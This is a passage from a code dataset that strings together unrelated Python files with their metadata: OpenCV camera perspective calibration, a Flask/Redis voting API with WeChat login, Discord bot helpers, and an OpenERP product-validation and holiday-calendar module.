img_, tuple(corner), 5, (0,0,255), thickness=-1) cv2.putText( img_ , str(num), tuple(corner), cv2.FONT_HERSHEY_COMPLEX_SMALL, 3, (0,0,255), thickness=2) cv2.imshow('image_border_corners_' + cam_pos, cv2.resize( img_, None, fx=0.5, fy=0.5)) key = cv2.waitKey(0) cv2.destroyAllWindows() if key==ord('n'): continue #---------------------------------- org_pts = np.array( org_pts, dtype = np.float32) dst_pts = np.array( [[ self.border * self.chess_home_size_px, self.border * self.chess_home_size_px], [(self.border + self.chess_size[0]-1)* self.chess_home_size_px , self.border * self.chess_home_size_px], [ self.border * self.chess_home_size_px, (self.border + self.chess_size[1]-1)* self.chess_home_size_px ], [(self.border + self.chess_size[0]-1)* self.chess_home_size_px, (self.border + self.chess_size[1]-1)* self.chess_home_size_px]]).astype(np.float32 ) #---------------------------------- M = cv2.getPerspectiveTransform( org_pts, dst_pts) dst_w, dst_h = (2*self.border + self.chess_size[0]-1)* self.chess_home_size_px, (2*self.border + self.chess_size[1]-1)* self.chess_home_size_px self.dst_size = dst_w, dst_h np.save( os.path.join(self.path,'dsize'), np.array([dst_w, dst_h] )) np.save( os.path.join(self.path,'mtx_' + cam_pos ), M) if debug: while True: img = next( cam.grabber()) dst = cv2.warpPerspective( img, M, (dst_w, dst_h)) cv2.imshow('image', cv2.resize(img, None, fx=0.75, fy=0.75 )) cv2.imshow('dst', cv2.resize(dst, None, fx=0.75, fy=0.75 )) key = cv2.waitKey(50) if key == ord('n') or key == 27 or key == ord('y'): cv2.destroyAllWindows() break if key == 27 or key == ord('y'): break def load_mtx(self, cameras): for cam_pos,cam in cameras.items(): try: self.mtx[cam_pos] = np.load( os.path.join( self.path, 'mtx_' + cam_pos + '.npy') ) except: print('mtx_' + cam_pos + ' not found') try: self.dst_size = np.load('data/perspective_calib/dsize.npy') except: print('dst_size not found') def correct_all_persective(self, imgs): if len(self.dst_size)==0 or len(imgs)>len(self.mtx): print('matrix or dst_size not loaded') return -1 ress={} for cam_pos,img in imgs.items(): ress[cam_pos] = cv2.warpPerspective( img, self.mtx[cam_pos], tuple(self.dst_size)) return ress def correct_persective(self, img, cam_pos): if len(self.dst_size)==0 or self.mtx.get( cam_pos ) is None: print('matrix or dst_size not loaded') return -1 res = cv2.warpPerspective( img, self.mtx[cam_pos], tuple(self.dst_size)) return res if __name__ == '__main__': cameras = getCamerasDict( ul=1,ur=3, dl=0,dr=2) #cameras = {'UL':5, 'DL':30,'UR':1} perspective = calibration_perspective('data/perspective_calib', chess_size = (6,6), chess_home_size = 20, border = 3) perspective.calc_accuracy( cameras ) perspective.calc_calibration( cameras ) perspective.load_mtx(cameras) ''' ret = np.load(path_cal + '/ret.npy') mtx = np.load(path_cal + '/K.npy') dist = np.load(path_cal + '/dist.npy') rvecs = np.load(path_cal + '/rvecs.npy') tvecs = np.load(path_cal + '/tvecs.npy') cam_pos = 'UL' chess_size = (9,6) chess_home_size = 30 border = 2 while True: img = cv2.imread('data/cal_img/cal_18.jpg') gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) ret, corners = cv2.findChessboardCorners(gray, chess_size,None) if not ret: cv2.imshow('image', cv2.resize(img, None, fx=0.5, fy=0.5)) cv2.waitKey(100) continue criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001) corners= cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria) corners = corners.reshape((-1,2)) org_pts = [] if cam_pos == 'UL': org_pts.append( corners[0] ) org_pts.append( corners[chess_size[0] - 1] ) org_pts.append( corners[chess_size[0]*chess_size[1] - chess_size[0]] ) org_pts.append( corners[-1] ) for num,corner in enumerate(org_pts): cv2.circle( img, tuple(corner), 5, (0,0,255), thickness=-1) cv2.putText( img , str(num), tuple(corner), cv2.FONT_HERSHEY_COMPLEX_SMALL, 3, (0,0,255), thickness=2) cv2.imshow('image', cv2.resize( img, None, fx=0.5, fy=0.5)) key = cv2.waitKey(0) if key==ord('n'): continue org_pts = np.array( org_pts, dtype = np.float32) dst_pts = np.array( [[ border * chess_home_size, border * chess_home_size], [(border + chess_size[0]-1)* chess_home_size , border * chess_home_size], [ border * chess_home_size, (border + chess_size[1]-1)* chess_home_size ], [(border + chess_size[0]-1)* chess_home_size, (border + chess_size[1]-1)* chess_home_size]]).astype(np.float32 ) M = cv2.getPerspectiveTransform( org_pts, dst_pts) #dst_h = (2*border + chess_size[1]-1)* chess_home_size #dst_w = (2*border + chess_size[0]-1)* chess_home_size dst_w, dst_h = (2*border + chess_size[0]-1)* chess_home_size, (2*border + chess_size[1]-1)* chess_home_size while True: dst = cv2.warpPerspective( img, M, (dst_w, dst_h)) cv2.imshow('image', cv2.resize(img, None, fx=0.5, fy=0.5 )) cv2.imshow('dst', cv2.resize(dst, None, fx=0.5, fy=0.5 )) key = cv2.waitKey(50) if key == ord('n') or key == 27 or key == ord('y'): cv2.destroyAllWindows() break if key == 27 or key == ord('y'): break cv2.imshow('img', cv2.resize( img, None, fx=0.5, fy=0.5)) cv2.waitKey(50) '''
null
profilemeter_alpha/archive codes/perspective_calbration.py
perspective_calbration.py
py
20,808
python
en
code
null
code-starcoder2
83
[ { "api_name": "pypylon.pylon.TlFactory.GetInstance", "line_number": 17, "usage_type": "call" }, { "api_name": "pypylon.pylon.TlFactory", "line_number": 17, "usage_type": "attribute" }, { "api_name": "pypylon.pylon", "line_number": 17, "usage_type": "name" }, { "api_name": "pypylon.pylon.RuntimeException", "line_number": 21, "usage_type": "call" }, { "api_name": "pypylon.pylon", "line_number": 21, "usage_type": "name" }, { "api_name": "pypylon.pylon.InstantCamera", "line_number": 26, "usage_type": "call" }, { "api_name": "pypylon.pylon", "line_number": 26, "usage_type": "name" }, { "api_name": "pypylon.pylon.ImageFormatConverter", "line_number": 29, "usage_type": "call" }, { "api_name": "pypylon.pylon", "line_number": 29, "usage_type": "name" }, { "api_name": "pypylon.pylon.PixelType_BGR8packed", "line_number": 61, "usage_type": "attribute" }, { "api_name": "pypylon.pylon", "line_number": 61, "usage_type": "name" }, { "api_name": "pypylon.pylon.OutputBitAlignment_MsbAligned", "line_number": 62, "usage_type": "attribute" }, { "api_name": "pypylon.pylon", "line_number": 62, "usage_type": "name" }, { "api_name": "pypylon.pylon.TimeoutHandling_ThrowException", "line_number": 69, "usage_type": "attribute" }, { "api_name": "pypylon.pylon", "line_number": 69, "usage_type": "name" }, { "api_name": "time.sleep", "line_number": 86, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 88, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 90, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 92, "usage_type": "call" }, { "api_name": "cv2.cvtColor", "line_number": 105, "usage_type": "call" }, { "api_name": "cv2.COLOR_BGR2GRAY", "line_number": 105, "usage_type": "attribute" }, { "api_name": "cv2.findChessboardCorners", "line_number": 106, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 108, "usage_type": "call" }, { "api_name": "cv2.resize", "line_number": 108, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 109, "usage_type": "call" }, { "api_name": "cv2.TERM_CRITERIA_EPS", "line_number": 112, "usage_type": "attribute" }, { "api_name": "cv2.TERM_CRITERIA_MAX_ITER", "line_number": 112, "usage_type": "attribute" }, { "api_name": "cv2.cornerSubPix", "line_number": 113, "usage_type": "call" }, { "api_name": "cv2.circle", "line_number": 124, "usage_type": "call" }, { "api_name": "cv2.putText", "line_number": 125, "usage_type": "call" }, { "api_name": "cv2.FONT_HERSHEY_COMPLEX_SMALL", "line_number": 125, "usage_type": "attribute" }, { "api_name": "cv2.imshow", "line_number": 127, "usage_type": "call" }, { "api_name": "cv2.resize", "line_number": 127, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 128, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 133, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 133, "usage_type": "attribute" }, { "api_name": "numpy.array", "line_number": 134, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 137, "usage_type": "attribute" }, { "api_name": "cv2.getPerspectiveTransform", "line_number": 138, "usage_type": "call" }, { "api_name": "cv2.warpPerspective", "line_number": 145, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 147, "usage_type": "call" }, { "api_name": "cv2.resize", "line_number": 147, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 148, "usage_type": "call" }, { "api_name": "cv2.resize", "line_number": 148, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 149, "usage_type": "call" }, { "api_name": "cv2.destroyAllWindows", "line_number": 151, "usage_type": "call" }, { "api_name": "cv2.cvtColor", "line_number": 179, "usage_type": "call" }, { "api_name": "cv2.COLOR_BGR2GRAY", "line_number": 179, "usage_type": "attribute" }, { "api_name": "cv2.findChessboardCorners", "line_number": 181, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 184, "usage_type": "call" }, { "api_name": "cv2.resize", "line_number": 184, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 185, "usage_type": "call" }, { "api_name": "cv2.TERM_CRITERIA_EPS", "line_number": 190, "usage_type": "attribute" }, { "api_name": "cv2.TERM_CRITERIA_MAX_ITER", "line_number": 190, "usage_type": "attribute" }, { "api_name": "cv2.cornerSubPix", "line_number": 191, "usage_type": "call" }, { "api_name": "numpy.copy", "line_number": 208, "usage_type": "call" }, { "api_name": "cv2.circle", "line_number": 209, "usage_type": "call" }, { "api_name": "cv2.circle", "line_number": 210, "usage_type": "call" }, { "api_name": "cv2.circle", "line_number": 211, "usage_type": "call" }, { "api_name": "cv2.putText", "line_number": 213, "usage_type": "call" }, { "api_name": "numpy.int32", "line_number": 213, "usage_type": "attribute" }, { "api_name": "cv2.FONT_HERSHEY_COMPLEX_SMALL", "line_number": 213, "usage_type": "attribute" }, { "api_name": "cv2.putText", "line_number": 214, "usage_type": "call" }, { "api_name": "numpy.int32", "line_number": 214, "usage_type": "attribute" }, { "api_name": "cv2.FONT_HERSHEY_COMPLEX_SMALL", "line_number": 214, "usage_type": "attribute" }, { "api_name": "cv2.imshow", "line_number": 216, "usage_type": "call" }, { "api_name": "cv2.resize", "line_number": 216, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 217, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 222, "usage_type": "call" }, { "api_name": "cv2.destroyAllWindows", "line_number": 224, "usage_type": "call" }, { "api_name": "cv2.cvtColor", "line_number": 242, "usage_type": "call" }, { "api_name": "cv2.COLOR_BGR2GRAY", "line_number": 242, "usage_type": "attribute" }, { "api_name": "cv2.findChessboardCorners", "line_number": 243, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 246, "usage_type": "call" }, { "api_name": "cv2.resize", "line_number": 246, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 247, "usage_type": "call" }, { "api_name": "cv2.destroyAllWindows", "line_number": 250, "usage_type": "call" }, { "api_name": "cv2.TERM_CRITERIA_EPS", "line_number": 252, "usage_type": "attribute" }, { "api_name": "cv2.TERM_CRITERIA_MAX_ITER", "line_number": 252, "usage_type": "attribute" }, { "api_name": "cv2.cornerSubPix", "line_number": 253, "usage_type": "call" }, { "api_name": "numpy.copy", "line_number": 257, "usage_type": "call" }, { "api_name": "cv2.circle", "line_number": 259, "usage_type": "call" }, { "api_name": "cv2.putText", "line_number": 260, "usage_type": "call" }, { "api_name": "cv2.FONT_HERSHEY_COMPLEX_SMALL", "line_number": 260, "usage_type": "attribute" }, { "api_name": "cv2.imshow", "line_number": 262, "usage_type": "call" }, { "api_name": "cv2.resize", "line_number": 262, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 263, "usage_type": "call" }, { "api_name": "cv2.destroyAllWindows", "line_number": 264, "usage_type": "call" }, { "api_name": "numpy.copy", "line_number": 304, "usage_type": "call" }, { "api_name": "cv2.circle", "line_number": 306, "usage_type": "call" }, { "api_name": "cv2.putText", "line_number": 307, "usage_type": "call" }, { "api_name": "cv2.FONT_HERSHEY_COMPLEX_SMALL", "line_number": 307, "usage_type": "attribute" }, { "api_name": "cv2.imshow", "line_number": 309, "usage_type": "call" }, { "api_name": "cv2.resize", "line_number": 309, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 310, "usage_type": "call" }, { "api_name": "cv2.destroyAllWindows", "line_number": 311, "usage_type": "call" }, { "api_name": "numpy.array", "line_number": 316, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 316, "usage_type": "attribute" }, { "api_name": "numpy.array", "line_number": 317, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 320, "usage_type": "attribute" }, { "api_name": "cv2.getPerspectiveTransform", "line_number": 322, "usage_type": "call" }, { "api_name": "numpy.save", "line_number": 325, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 325, "usage_type": "call" }, { "api_name": "os.path", "line_number": 325, "usage_type": "attribute" }, { "api_name": "numpy.array", "line_number": 325, "usage_type": "call" }, { "api_name": "numpy.save", "line_number": 326, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 326, "usage_type": "call" }, { "api_name": "os.path", "line_number": 326, "usage_type": "attribute" }, { "api_name": "cv2.warpPerspective", "line_number": 332, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 333, "usage_type": "call" }, { "api_name": "cv2.resize", "line_number": 333, "usage_type": "call" }, { "api_name": "cv2.imshow", "line_number": 334, "usage_type": "call" }, { "api_name": "cv2.resize", "line_number": 334, "usage_type": "call" }, { "api_name": "cv2.waitKey", "line_number": 335, "usage_type": "call" }, { "api_name": "cv2.destroyAllWindows", "line_number": 337, "usage_type": "call" }, { "api_name": "numpy.load", "line_number": 346, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 346, "usage_type": "call" }, { "api_name": "os.path", "line_number": 346, "usage_type": "attribute" }, { "api_name": "numpy.load", "line_number": 351, "usage_type": "call" }, { "api_name": "cv2.warpPerspective", "line_number": 362, "usage_type": "call" }, { "api_name": "cv2.warpPerspective", "line_number": 369, "usage_type": "call" } ]
333170670
import config import mysql.connector import redis import requests import time from flask import Flask, request, session, jsonify, redirect, abort from flask_cors import CORS app = Flask(__name__) app.config['SECRET_KEY'] = config.SECRET_KEY app.config['DEBUG'] = False #CORS(app, supports_credentials=True) r = redis.Redis(host=config.redis['host'], port=config.redis['port'], db=config.redis['db']) conn = mysql.connector.connect(host=config.db['host'], user=config.db['user'], passwd=config.db['passwd'], database=config.db['database'], charset='utf8mb4', autocommit=1) db = conn.cursor() def checkWechatLogin(): if "user_id" not in session: sess_id = request.cookies.get("PHPSESSID") if sess_id is not None: r = requests.get(config.wx_check_url, timeout=5, cookies=dict(PHPSESSID=sess_id)) try: t = r.json() if "openid" in t: try: conn.ping() except mysql.connector.errors.InterfaceError: conn.reconnect() db.execute('select id from users where openid=%s', (t['openid'],)) result = db.fetchall() if not result: db.execute('insert into users (openid,nickname,headpic) value (%s,%s,%s)',(t['openid'],t['nickname'],t['headpic'])) db.execute('select id from users where openid=%s', (t['openid'],)) result = db.fetchall() session['user_id'] = result[0][0] except: pass if "user_id" not in session: abort(401) return session['user_id'] @app.errorhandler(401) def page_not_found(error): return "请先登录微信!", 401 # @app.route('/setuserid/<id>', methods=['get']) # def setuserid(id): # session['user_id'] = id # return "OK", 204 # @app.route('/clearuserid', methods=['get']) # def clearuserid(): # session.clear() # return "OK",204 @app.route('/info', methods=['get']) def getinfo(): checkWechatLogin() keys = ['index', 'name', 'text', 'iconsrc', 'audiosrc'] anchors = [] try: conn.ping() except mysql.connector.errors.InterfaceError: conn.reconnect() db.execute("select id,name,declaration,imgsrc,audiosrc from anchors order by id") result = db.fetchall() db.execute("select a.id,ifnull(b.number,0) from `anchors` as a left join (select anchor_id,count(anchor_id) as number from votes group by anchor_id order by anchor_id) as b on a.id=b.anchor_id group by a.id order by a.id") num = db.fetchall() i = 0 for anchor in result: d = dict(zip(keys, anchor)) d['audiosrc'] = config.audio_url + d['audiosrc'] d['iconsrc'] = config.pic_url + d['iconsrc'] d['number'] = num[i][1] i = i + 1 anchors.append(d) return jsonify(anchors), 200 @app.route('/vote/<id>', methods=['POST']) def vote(id): if int(id) not in range(1, 13): return jsonify({ 'errcode':6, 'errmsg':config.errmsg['index_err'] }) now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) if now > config.end_time: return jsonify({ 'errcode':5, 'errmsg':config.errmsg['end'] }) if now < config.start_time: return jsonify({ 'errcode':4, 'errmsg':config.errmsg['start'] }) user_id = checkWechatLogin() try: conn.ping() except mysql.connector.errors.InterfaceError: conn.reconnect() p = (user_id,) db.execute('select created_at from `votes` where `user_id` = %s order by created_at desc limit 1',p) result=db.fetchall() if result: last = str(result[0][0]) now = time.strftime('%Y-%m-%d', time.localtime(time.time())) if last > now: return jsonify({ 'errcode':3, 'errmsg':config.errmsg['day_limit'] }) luastr = """ if redis.call('exists',KEYS[1]) == 1 then if tonumber(redis.call('get',KEYS[1])) >= tonumber(ARGV[1]) then return 0 end else redis.call('set',KEYS[1],1) redis.call('expire',KEYS[1],60) end redis.call('incr',KEYS[1]) return 1 """ lua = r.register_script(luastr) if int(lua(keys=['have' + str(id)], args=[config.vote_number_min])): p = (session['user_id'], id) db.execute("insert into votes (user_id,anchor_id) values (%s,%s)", p) if db.rowcount: return jsonify({ 'errcode': 0, 'errmsg': config.errmsg['success'] }),200 else: return jsonify({ 'errcode': 1, 'errmsg': config.errmsg['insert_err'] }) else: return jsonify({ 'errcode':2, 'errmsg':config.errmsg['min_limit'] }) if __name__ == '__main__': app.run(port=config.app_port)
null
backend/app.py
app.py
py
4,316
python
en
code
null
code-starcoder2
83
[ { "api_name": "flask.Flask", "line_number": 11, "usage_type": "call" }, { "api_name": "config.SECRET_KEY", "line_number": 12, "usage_type": "attribute" }, { "api_name": "redis.Redis", "line_number": 17, "usage_type": "call" }, { "api_name": "config.redis", "line_number": 17, "usage_type": "attribute" }, { "api_name": "mysql.connector.connector.connect", "line_number": 18, "usage_type": "call" }, { "api_name": "mysql.connector.connector", "line_number": 18, "usage_type": "attribute" }, { "api_name": "mysql.connector", "line_number": 18, "usage_type": "name" }, { "api_name": "config.db", "line_number": 18, "usage_type": "attribute" }, { "api_name": "config.db", "line_number": 19, "usage_type": "attribute" }, { "api_name": "flask.session", "line_number": 24, "usage_type": "name" }, { "api_name": "flask.request.cookies.get", "line_number": 25, "usage_type": "call" }, { "api_name": "flask.request.cookies", "line_number": 25, "usage_type": "attribute" }, { "api_name": "flask.request", "line_number": 25, "usage_type": "name" }, { "api_name": "requests.get", "line_number": 27, "usage_type": "call" }, { "api_name": "config.wx_check_url", "line_number": 27, "usage_type": "attribute" }, { "api_name": "mysql.connector.connector", "line_number": 33, "usage_type": "attribute" }, { "api_name": "mysql.connector", "line_number": 33, "usage_type": "name" }, { "api_name": "flask.session", "line_number": 41, "usage_type": "name" }, { "api_name": "flask.session", "line_number": 44, "usage_type": "name" }, { "api_name": "flask.abort", "line_number": 45, "usage_type": "call" }, { "api_name": "flask.session", "line_number": 46, "usage_type": "name" }, { "api_name": "mysql.connector.connector", "line_number": 70, "usage_type": "attribute" }, { "api_name": "mysql.connector", "line_number": 70, "usage_type": "name" }, { "api_name": "config.audio_url", "line_number": 79, "usage_type": "attribute" }, { "api_name": "config.pic_url", "line_number": 80, "usage_type": "attribute" }, { "api_name": "flask.jsonify", "line_number": 84, "usage_type": "call" }, { "api_name": "flask.jsonify", "line_number": 90, "usage_type": "call" }, { "api_name": "config.errmsg", "line_number": 92, "usage_type": "attribute" }, { "api_name": "time.strftime", "line_number": 94, "usage_type": "call" }, { "api_name": "time.localtime", "line_number": 94, "usage_type": "call" }, { "api_name": "time.time", "line_number": 94, "usage_type": "call" }, { "api_name": "config.end_time", "line_number": 95, "usage_type": "attribute" }, { "api_name": "flask.jsonify", "line_number": 96, "usage_type": "call" }, { "api_name": "config.errmsg", "line_number": 98, "usage_type": "attribute" }, { "api_name": "config.start_time", "line_number": 100, "usage_type": "attribute" }, { "api_name": "flask.jsonify", "line_number": 101, "usage_type": "call" }, { "api_name": "config.errmsg", "line_number": 103, "usage_type": "attribute" }, { "api_name": "mysql.connector.connector", "line_number": 108, "usage_type": "attribute" }, { "api_name": "mysql.connector", "line_number": 108, "usage_type": "name" }, { "api_name": "time.strftime", "line_number": 115, "usage_type": "call" }, { "api_name": "time.localtime", "line_number": 115, "usage_type": "call" }, { "api_name": "time.time", "line_number": 115, "usage_type": "call" }, { "api_name": "flask.jsonify", "line_number": 117, "usage_type": "call" }, { "api_name": "config.errmsg", "line_number": 119, "usage_type": "attribute" }, { "api_name": "config.vote_number_min", "line_number": 135, "usage_type": "attribute" }, { "api_name": "flask.session", "line_number": 136, "usage_type": "name" }, { "api_name": "flask.jsonify", "line_number": 139, "usage_type": "call" }, { "api_name": "config.errmsg", "line_number": 141, "usage_type": "attribute" }, { "api_name": "flask.jsonify", "line_number": 144, "usage_type": "call" }, { "api_name": "config.errmsg", "line_number": 146, "usage_type": "attribute" }, { "api_name": "flask.jsonify", "line_number": 149, "usage_type": "call" }, { "api_name": "config.errmsg", "line_number": 151, "usage_type": "attribute" }, { "api_name": "config.app_port", "line_number": 156, "usage_type": "attribute" } ]
109846729
import os import json import discord ADMINS = {} class EcosystemBots: FullyAutomatedNutcracker = "FAN_" def load_creds(is_debug, bot: str): with open('config/creds.json') as fp: creds = json.load(fp) return creds[bot + "BETA_TOKEN"] if is_debug else creds[bot + "TOKEN"] def load_admins(): global ADMINS with open('config/admin.json') as fp: ADMINS = json.load(fp) def is_admin(user: discord.User): return str(user.id) in ADMINS def get_last_log_file_path(): scriptpath = os.path.realpath(__file__) rootpath = os.path.abspath(os.path.join(scriptpath, '..', '..', '..')) logspath = os.path.abspath(os.path.join(rootpath, 'logs')) logs = [os.path.join(logspath, log) for log in os.listdir(logspath)] latest = max(logs, key=os.path.getctime) return latest def tail(f, lines): tail_log = [] at_idx = 0 for line in f.readlines(): if len(tail_log) == lines: tail_log[at_idx] = line at_idx = (at_idx + 1) % lines else: tail_log.append(line) return tail_log[at_idx:] + tail_log[:at_idx] def tail_error(f): last_error = "" listening = False for line in f.readlines(): if "Catching exception in command error" in line: listening = True last_error = "" if line.startswith("discord.ext.commands.errors.CommandInvokeError: Command raised an exception:"): last_error += line listening = False if listening: last_error += line return last_error
null
src/utils/common.py
common.py
py
1,582
python
en
code
null
code-starcoder2
83
[ { "api_name": "json.load", "line_number": 15, "usage_type": "call" }, { "api_name": "json.load", "line_number": 22, "usage_type": "call" }, { "api_name": "discord.User", "line_number": 25, "usage_type": "attribute" }, { "api_name": "os.path.realpath", "line_number": 30, "usage_type": "call" }, { "api_name": "os.path", "line_number": 30, "usage_type": "attribute" }, { "api_name": "os.path.abspath", "line_number": 31, "usage_type": "call" }, { "api_name": "os.path", "line_number": 31, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 31, "usage_type": "call" }, { "api_name": "os.path.abspath", "line_number": 32, "usage_type": "call" }, { "api_name": "os.path", "line_number": 32, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 32, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 33, "usage_type": "call" }, { "api_name": "os.path", "line_number": 33, "usage_type": "attribute" }, { "api_name": "os.listdir", "line_number": 33, "usage_type": "call" }, { "api_name": "os.path", "line_number": 34, "usage_type": "attribute" } ]
627716920
# -*- coding: utf-8 -*- # ############################################################################# # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from datetime import datetime, date, timedelta import re from openerp.osv import fields, osv from openerp.tools.translate import _ def test_item_id(self, cr, uid, item_id, natureza): db_product_product = self.pool.get('product.product') obj_product = db_product_product.browse(cr, uid, item_id) message = '' if natureza in ['rec', 'ots']: if hasattr(obj_product.product_tmpl_id, 'property_account_income'): if obj_product.product_tmpl_id.property_account_income.id is False: message += u'Contabilidade/Conta de Despesa associada ao cliente\n' else: message += u'Contabilidade/Conta de Despesa associada ao cliente\n' if obj_product.product_tmpl_id.sale_ok is False: message += u'Seleccionar opção "Pode ser vendido"\n' elif natureza == 'des': if hasattr(obj_product.product_tmpl_id, 'property_account_expense'): if obj_product.product_tmpl_id.property_account_expense.id is False: message += u'Contabilidade/Conta de Despesa associada ao fornecedor\n' else: message += u'Contabilidade/Conta de Despesa associada ao fornecedor\n' if obj_product.product_tmpl_id.purchase_ok is False: message += u'Seleccionar opção "Pode ser comprado"\n' if hasattr(obj_product.product_tmpl_id, 'property_stock_account_input'): if obj_product.product_tmpl_id.property_stock_account_input.id is False: message += u'Contabilidade/Avaliação do Inventário/' \ u'Tempo Real(automatizado) e Conta Stock de Entrada\n' else: message += u'Contabilidade/Avaliação do Inventário/' \ u'Tempo Real(automatizado) e Conta Stock de Entrada\n' if hasattr(obj_product.product_tmpl_id, 'property_stock_account_output'): if obj_product.product_tmpl_id.property_stock_account_output.id is False: message += u'Contabilidade/Avaliação do Inventário/' \ u'Tempo Real(automatizado) e Conta de saída de Stock\n' else: message += u'Contabilidade/Avaliação do Inventário/' \ u'Tempo Real(automatizado) e Conta de saída de Stock\n' res_id = u'product.template,' + unicode(obj_product.product_tmpl_id.id) cr.execute(""" SELECT value_float FROM ir_property WHERE name = 'standard_price' AND res_id = '%s' """ % res_id) standard_price = cr.fetchone() if standard_price is None or standard_price[0] <= 0: message += u'Procurements/Preço de Custo (valor positivo)\n' if obj_product.default_code is False: message += u'Informação/Referência Interna\n' if len(obj_product.product_tmpl_id.taxes_id) == 0: message += u'Contabilidade/Impostos a Cliente\n' if len(obj_product.product_tmpl_id.supplier_taxes_id) == 0: message += u'Contabilidade/Impostos do Fornecedor\n' if obj_product.product_tmpl_id.type != 'product': message += u' Informação/Tipo de Artigo/Artigo Armazenável\n' if obj_product.product_tmpl_id.categ_id.id is not False: x = obj_product.product_tmpl_id.categ_id.property_stock_valuation_account_id.id if x is False: message += u' Para as categorias dos artigos defina a Conta de avaliação de stock.' if len(message) != 0: raise osv.except_osv(_(u'Aviso'), _(u'Para evitar futuros erros na execução do programa ' u'deverá preencher os seguintes campos do artigo:\n' + message)) return True def get_sequence(self, cr, uid, context, text, value): # tipos de sequencia # Sequencia 'text' +_id seq = self.pool.get('ir.sequence').get(cr, uid, 'seq_' + text + '_code_' + unicode(value)) if seq is False: sequence_type = self.pool.get('ir.sequence.type') values_type = { 'name': 'type_' + text + '_name_' + unicode(value), 'code': 'seq_' + text + '_code_' + unicode(value)} sequence_type.create(cr, uid, values_type, context=context) sequence = self.pool.get('ir.sequence') values = { 'name': 'seq_' + text + '_name_' + unicode(value), 'code': 'seq_' + text + '_code_' + unicode(value), 'number_next': 1, 'number_increment': 1} sequence.create(cr, uid, values, context=context) seq = self.pool.get('ir.sequence').get(cr, uid, 'seq_' + text + '_code_' + unicode(value)) return seq # ______________________________________________________Calendário_________________________________________ class sncp_comum_calendario(osv.Model): _name = 'sncp.comum.calendario' _description = u"Calendário" def copiar_ano(self, cr, uid, ids, context): self.write(cr, uid, ids, {'state': 1}) obj_calendario = self.browse(cr, uid, ids[0]) ano_calc = obj_calendario.name + 1 ano_calc_id = self.create(cr, uid, {'name': ano_calc}) db_sncp_comum_feriados = self.pool.get('sncp.comum.feriados') feriados_ids = db_sncp_comum_feriados.search(cr, uid, [('ano_id', '=', ids[0]), ('tipo', '=', 'fix')]) for record in db_sncp_comum_feriados.browse(cr, uid, feriados_ids): record_data = datetime.strptime(record.data, "%Y-%m-%d") data = record_data.date() data = data.replace(year=ano_calc) vals = {'ano_id': ano_calc_id, 'name': record.name, 'data': unicode(data), 'tipo': 'fix'} db_sncp_comum_feriados.create(cr, uid, vals) number = ano_calc % 19 + 1 data = None if number == 1: data = date(ano_calc, 4, 14) elif number == 2: data = date(ano_calc, 4, 3) elif number == 3: data = date(ano_calc, 3, 23) elif number == 4: data = date(ano_calc, 4, 11) elif number == 5: data = date(ano_calc, 3, 31) elif number == 6: data = date(ano_calc, 4, 18) elif number == 7: data = date(ano_calc, 4, 8) elif number == 8: data = date(ano_calc, 3, 28) elif number == 9: data = date(ano_calc, 4, 16) elif number == 10: data = date(ano_calc, 4, 5) elif number == 11: data = date(ano_calc, 3, 25) elif number == 12: data = date(ano_calc, 4, 13) elif number == 13: data = date(ano_calc, 4, 2) elif number == 14: data = date(ano_calc, 3, 22) elif number == 15: data = date(ano_calc, 4, 10) elif number == 16: data = date(ano_calc, 3, 30) elif number == 17: data = date(ano_calc, 4, 17) elif number == 18: data = date(ano_calc, 4, 7) elif number == 19: data = date(ano_calc, 3, 27) data_pascoa = data + timedelta(days=(6 - data.weekday())) db_sncp_comum_feriados.create(cr, uid, {'ano_id': ano_calc_id, 'name': u'Páscoa', 'data': unicode(data_pascoa), 'tipo': 'mov'}) db_sncp_comum_feriados.create(cr, uid, {'ano_id': ano_calc_id, 'name': 'Carnaval', 'data': unicode(data_pascoa - timedelta(days=47)), 'tipo': 'mov'}) db_sncp_comum_feriados.create(cr, uid, {'ano_id': ano_calc_id, 'name': u'Sexta-Feira Santa', 'data': unicode(data_pascoa - timedelta(days=2)), 'tipo': 'mov'}) return True _columns = { 'name': fields.integer(u'Ano', size=4), 'feriado_id': 